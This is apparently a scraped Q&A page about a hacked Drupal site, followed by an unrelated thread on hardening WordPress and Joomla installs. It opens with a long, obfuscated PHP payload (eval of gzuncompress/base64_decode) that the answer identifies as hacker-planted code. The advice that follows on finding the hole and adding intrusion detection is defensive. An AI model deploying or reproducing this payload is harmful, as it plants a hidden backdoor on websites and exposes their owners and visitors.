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'))); ?><?php eval(gzuncompress(base64_decode('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'))); ?>

First of all, you need to know two things:
This may not be your fault. If its a shared host, the hacker may have compromised any of the other thousand websites on the host, rooted the server, and then attacked your site from within.
Having said that, it may be your fault, so don't relax. Still look for holes.
But, besides looking at the logs, look for vulnerabilities within the sites. Does the site accept user-submitted content? If so, are there file uploads. If so, do you check the file for MIME-Type or just extension.
Another thing is RFI and LFI hacks. These vulnerabilities allow hackers to inject shells into your site, effectively making them administrators with complete file access. Look for these vulnerabilities.
If you can post the code in the .txt files, I'd be happy to "decipher" it for you.
If I can think of anything else, I'll addon.
Edit 1
So, essentially the hacker used base64 and gzcompress to "obfuscate" the code. He then executes the uncompressed code with the eval() function. So, essentially, you can see the first layer of code by removing the eval() function and running the code. Unfortunately, under the first layer, there's another layer which I'm looking at.
In addition, since you say Drupal.... you may be using addons or plugins. Drupal may be secure, but those addons or plugins may not be. Do any of them handle form uploads or files in any way?
Edit 2
First Layer (Submitted by OP).
Second Layer (Initial gzuncompress and base64_decode()).
Still working on it...

Which additional securities do you add to your open source cms installations? [closed]

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 2 years ago.
Improve this question
I know that being open source does not necessarily makes a program more/less secure than closed source (let's assume this neutrality, to keep flames out of this post). Fact is: since the source code is open, everybody knows your defaults urls, default administrator logins, etc.
I'm using Wordpress and Joomla in some projects of my clients, and I always try to create some kind of additional security. Excluding always updating your files to latest version, what do you usually do to add more security in this scenario? Some of my thoughts:
I always change the "admin" name when applicable;
I would like to don't explicity say which technologies I'm using, but since I want to promote the cms (I think is the minimal I should do), I just don't say the exact version so attackers don't know which exact vulnerabilities they can attack (wordpress automatically creates a meta tag in html saying "Wordpress 2.8.4" for example);
Set correct permissions in directories, and bash scripts in my server that run everyday at 0h setting 755 to directories I may have changed to 775 during the day and forgot to turn back;
When applicable, I set apache configuration to limit ips.
What else should I try to do? What "out of the box" solutions do you usually do to your installations?

Using something like the mod_security or mod_evasive Apache's modules can be an idea too -- I suppose they require some configuration, though ; and you should test you website still works OK before using those on your production server.
As they are Apache's modules, it also requires you can install new Apache's module -- which means you have to be admin of the server.
On a pure PHP-level, there is a tool called PHP-IDS ; quoting its website :
PHPIDS (PHP-Intrusion Detection
System) is a simple to use, well
structured, fast and state-of-the-art
security layer for your PHP based web
application. The IDS neither strips,
sanitizes nor filters any malicious
input, it simply recognizes when an
attacker tries to break your site and
reacts in exactly the way you want it
to. Based on a set of approved and
heavily tested filter rules any attack
is given a numerical impact rating
which makes it easy to decide what
kind of action should follow the
hacking attempt. This could range from
simple logging to sending out an
emergency mail to the development
team, displaying a warning message for
the attacker or even ending the user’s
session.
I suppose you could "plug" it in front of the CMS you are using, by adding a couple of lines to its entry point -- if there is a common entry point you can identify, or some file that's included once at the beginning of each page.
There is a "How to use it in my application?" entry in the FAQ.
